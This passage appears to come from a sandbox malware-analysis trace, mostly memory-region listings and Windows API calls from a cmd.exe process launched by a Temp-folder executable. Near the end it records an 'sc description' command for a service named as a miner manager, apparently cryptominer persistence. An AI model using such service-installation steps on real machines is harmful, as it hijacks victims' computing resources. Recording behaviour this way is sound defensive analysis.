"\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6100 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 6101 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6102 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 6103 start_va = 0x350000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 6104 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6105 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6107 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6108 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 6109 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 6110 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 6111 start_va = 0x4b0000 end_va = 0x516fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6112 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6113 start_va = 0x753f0000 end_va = 0x753f6fff monitored = 0 entry_point = 0x753f1230 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 6114 start_va = 0x773b0000 end_va = 0x774affff monitored = 0 entry_point = 0x773cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 6115 start_va = 0x77240000 end_va = 0x772cffff monitored = 0 entry_point = 0x77256343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 6116 start_va = 0x75780000 end_va = 0x75789fff monitored = 0 entry_point = 0x757836a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 6117 start_va = 0x76ac0000 end_va = 0x76b5cfff monitored = 0 entry_point = 0x76af3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 6118 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 6119 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6120 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6121 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6122 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6123 start_va = 0x520000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 6124 start_va = 0x70000 end_va = 0x8dfff monitored = 0 entry_point = 0x8158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 6125 start_va = 0x640000 end_va = 0x7c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 6126 start_va = 0x70000 end_va = 0x8dfff monitored = 0 entry_point = 0x8158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 6127 start_va = 0x76b90000 end_va = 0x76beffff monitored = 0 entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 6128 start_va = 0x774b0000 end_va = 0x7757bfff monitored = 0 entry_point = 0x774b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 6129 start_va = 0x7d0000 end_va = 0x950fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 6130 start_va = 0x960000 end_va = 0x1d5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 6131 start_va = 0x70000 end_va = 0x8ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\cmd.exe.mui") Region: id = 6132 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6133 start_va = 0x90000 end_va = 0x90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 6164 start_va = 0x1d60000 end_va = 0x202efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 241 os_tid = 0xa6c [0275.969] GetProcAddress (hModule=0x769b0000, lpProcName="SetConsoleInputExeNameW") returned 0x769da775 [0275.970] GetProcessHeap () returned 0x3b0000 [0275.970] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x400a) returned 0x3c5940 [0275.970] GetProcessHeap () returned 0x3b0000 [0275.970] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c5940 | out: hHeap=0x3b0000) returned 1 [0275.971] _wcsicmp (_String1="sc", _String2=")") returned 74 [0275.971] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0275.971] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0275.971] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0275.971] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0275.971] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0275.972] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0275.972] GetProcessHeap () returned 0x3b0000 [0275.972] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x58) returned 0x3c30d8 [0275.972] GetProcessHeap () returned 0x3b0000 [0275.972] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xe) returned 0x3c0090 [0275.973] GetProcessHeap () returned 0x3b0000 [0275.973] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x6e) returned 0x3c3138 [0275.974] GetConsoleTitleW (in: lpConsoleTitle=0x34f590, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe") returned 0x2b [0275.974] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0275.974] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0275.974] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0275.974] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0275.975] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0275.975] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0275.975] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0275.975] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0275.975] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0275.975] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0275.975] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0275.975] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0275.975] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0275.975] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0275.975] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0275.975] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0275.975] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0275.975] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0275.975] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0275.975] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0275.975] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0275.975] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0275.975] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0275.975] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0275.975] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0275.975] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0275.975] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0275.975] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0275.975] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0275.976] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0275.976] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0275.976] _wcsicmp (_String1="sc", _String2="START") returned -17 [0275.976] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0275.976] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0275.976] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0275.976] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0275.976] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0275.976] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0275.976] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0275.976] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0275.976] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0275.976] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0275.976] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0275.976] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0275.976] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0275.976] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0275.976] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0275.976] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0275.976] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0275.976] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0275.976] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0275.976] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0275.976] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0275.976] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0275.977] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0275.977] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0275.977] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0275.977] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0275.977] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0275.977] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0275.977] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0275.977] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0275.977] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0275.977] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0275.977] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0275.977] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0275.977] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0275.977] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0275.977] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0275.977] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0275.977] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0275.977] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0275.977] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0275.977] _wcsicmp (_String1="sc", _String2="START") returned -17 [0275.977] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0275.977] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0275.977] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0275.977] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0275.977] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0275.977] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0275.977] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0275.978] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0275.978] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0275.978] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0275.978] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0275.978] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0275.978] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0275.978] GetProcessHeap () returned 0x3b0000 [0275.978] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x210) returned 0x3c31b0 [0275.978] GetProcessHeap () returned 0x3b0000 [0275.978] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x74) returned 0x3c99f0 [0275.978] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0275.978] GetProcessHeap () returned 0x3b0000 [0275.978] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x418) returned 0x3b07f0 [0275.978] SetErrorMode (uMode=0x0) returned 0x8001 [0275.979] SetErrorMode (uMode=0x1) returned 0x0 [0275.979] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3b07f8, lpFilePart=0x34f0b0 | out: lpBuffer="C:\\Windows", lpFilePart=0x34f0b0*="Windows") returned 0xa [0275.979] SetErrorMode (uMode=0x8001) returned 0x1 [0275.979] GetProcessHeap () returned 0x3b0000 [0275.979] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3b07f0, Size=0x24) returned 0x3b07f0 [0275.979] GetProcessHeap () returned 0x3b0000 [0275.979] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3b07f0) returned 0x24 [0275.979] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ab60640, nSize=0x2000 | out: lpBuffer="") returned 0x8f [0275.979] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0275.979] GetProcessHeap () returned 0x3b0000 [0275.979] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x142) returned 0x3c33c8 [0275.979] GetProcessHeap () returned 0x3b0000 [0275.979] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x27c) returned 0x3b0820 [0275.990] GetProcessHeap () returned 0x3b0000 [0275.990] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3b0820, Size=0x144) returned 0x3b0820 [0275.990] GetProcessHeap () returned 0x3b0000 [0275.990] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3b0820) returned 0x144 [0275.990] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ab60640, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0275.990] GetProcessHeap () returned 0x3b0000 [0275.990] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xe0) returned 0x3c3518 [0275.991] GetProcessHeap () returned 0x3b0000 [0275.991] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3c3518, Size=0x76) returned 0x3c3518 [0275.991] GetProcessHeap () returned 0x3b0000 [0275.991] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3c3518) returned 0x76 [0275.992] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0275.992] FindFirstFileExW (in: lpFileName="C:\\Windows\\sc.*", fInfoLevelId=0x1, lpFindFileData=0x34ee2c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34ee2c) returned 0xffffffff [0275.993] GetLastError () returned 0x2 [0275.993] FindFirstFileExW (in: lpFileName="C:\\Windows\\sc", fInfoLevelId=0x1, lpFindFileData=0x34ee2c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34ee2c) returned 0xffffffff [0275.993] GetLastError () returned 0x2 [0275.993] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0275.994] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.*", fInfoLevelId=0x1, lpFindFileData=0x34ee2c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34ee2c) returned 0x3c1fd8 [0275.994] GetProcessHeap () returned 0x3b0000 [0275.994] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x0, Size=0x14) returned 0x3c3598 [0275.994] FindClose (in: hFindFile=0x3c1fd8 | out: hFindFile=0x3c1fd8) returned 1 [0275.994] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.COM", fInfoLevelId=0x1, lpFindFileData=0x34ee2c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34ee2c) returned 0xffffffff [0275.994] GetLastError () returned 0x2 [0275.995] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.EXE", fInfoLevelId=0x1, lpFindFileData=0x34ee2c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34ee2c) returned 0x3c1fd8 [0275.995] GetProcessHeap () returned 0x3b0000 [0275.995] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3c3598, Size=0x4) returned 0x3c3598 [0275.995] FindClose (in: hFindFile=0x3c1fd8 | out: hFindFile=0x3c1fd8) returned 1 [0275.995] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0275.995] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0275.995] GetConsoleTitleW (in: lpConsoleTitle=0x34f324, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe") returned 0x2b [0276.174] InitializeProcThreadAttributeList (in: lpAttributeList=0x34f1ac, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x34f274 | out: lpAttributeList=0x34f1ac, lpSize=0x34f274) returned 1 [0276.174] UpdateProcThreadAttribute (in: lpAttributeList=0x34f1ac, dwFlags=0x0, Attribute=0x60001, lpValue=0x34f26c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x34f1ac, lpPreviousValue=0x0) returned 1 [0276.174] GetStartupInfoW (in: lpStartupInfo=0x34f168 | out: lpStartupInfo=0x34f168*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x20c, hStdOutput=0x214, hStdError=0x214)) [0276.175] GetProcessHeap () returned 0x3b0000 [0276.175] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x18) returned 0x3c1fd8 [0276.175] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0276.175] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0276.175] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0276.175] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0276.175] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0276.175] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0276.175] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0276.176] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0276.176] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0276.176] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0276.176] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0276.176] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0276.176] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0276.176] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0276.176] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0276.176] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0276.176] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0276.176] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0276.176] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0276.176] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0276.176] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0276.176] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0276.176] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0276.176] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0276.176] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0276.176] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0276.176] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0276.176] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0276.176] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0276.176] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0276.176] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0276.176] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0276.176] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0276.176] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0276.177] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0276.177] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0276.177] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0276.177] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0276.177] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0276.177] GetProcessHeap () returned 0x3b0000 [0276.177] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c1fd8 | out: hHeap=0x3b0000) returned 1 [0276.177] GetProcessHeap () returned 0x3b0000 [0276.177] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xa) returned 0x3c00a8 [0276.177] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0276.180] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc description MiningeService ServiceManagerForMiner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows", lpStartupInfo=0x34f208*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc description MiningeService ServiceManagerForMiner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x34f254 | out: lpCommandLine="sc description MiningeService ServiceManagerForMiner", lpProcessInformation=0x34f254*(hProcess=0x84, hThread=0x80, dwProcessId=0xa88, dwThreadId=0xa8c)) returned 1 [0276.203] CloseHandle (hObject=0x80) returned 1 [0276.203] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0276.203] GetProcessHeap () returned 0x3b0000 [0276.203] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c4df0 | out: hHeap=0x3b0000) returned 1 [0276.203] GetEnvironmentStringsW () returned 0x3cb958* [0276.203] GetProcessHeap () returned 0x3b0000 [0276.203] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xb44) returned 0x3c42a0 [0276.203] FreeEnvironmentStringsW (penv=0x3cb958) returned 1 [0276.203] WaitForSingleObject (hHandle=0x84, dwMilliseconds=0xffffffff) returned 0x0 [0277.114] GetExitCodeProcess (in: hProcess=0x84, lpExitCode=0x34f148 | out: lpExitCode=0x34f148*=0x0) returned 1 [0277.114] CloseHandle (hObject=0x84) returned 1 [0277.114] _vsnwprintf (in: _Buffer=0x34f290, _BufferCount=0x13, _Format="%08X", _ArgList=0x34f154 | out: _Buffer="00000000") returned 8 [0277.114] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0277.114] GetProcessHeap () returned 0x3b0000 [0277.115] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c42a0 | out: hHeap=0x3b0000) returned 1 [0277.115] GetEnvironmentStringsW () returned 0x3c42a0* [0277.115] GetProcessHeap () returned 0x3b0000 [0277.115] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xb6a) returned 0x3c4e18 [0277.116] FreeEnvironmentStringsW (penv=0x3c42a0) returned 1 [0277.116] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0277.116] GetProcessHeap () returned 0x3b0000 [0277.116] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c4e18 | out: hHeap=0x3b0000) returned 1 [0277.116] GetEnvironmentStringsW () returned 0x3c42a0* [0277.116] GetProcessHeap () returned 0x3b0000 [0277.116] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xb6a) returned 0x3c4e18 [0277.117] FreeEnvironmentStringsW (penv=0x3c42a0) returned 1 [0277.117] GetProcessHeap () returned 0x3b0000 [0277.117] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c00a8 | out: hHeap=0x3b0000) returned 1 [0277.117] DeleteProcThreadAttributeList (in: lpAttributeList=0x34f1ac | out: lpAttributeList=0x34f1ac) [0277.117] _get_osfhandle (_FileHandle=1) returned 0x214 [0277.117] SetConsoleMode (hConsoleHandle=0x214, dwMode=0x0) returned 0 [0277.118] _get_osfhandle (_FileHandle=1) returned 0x214 [0277.118] GetConsoleMode (in: 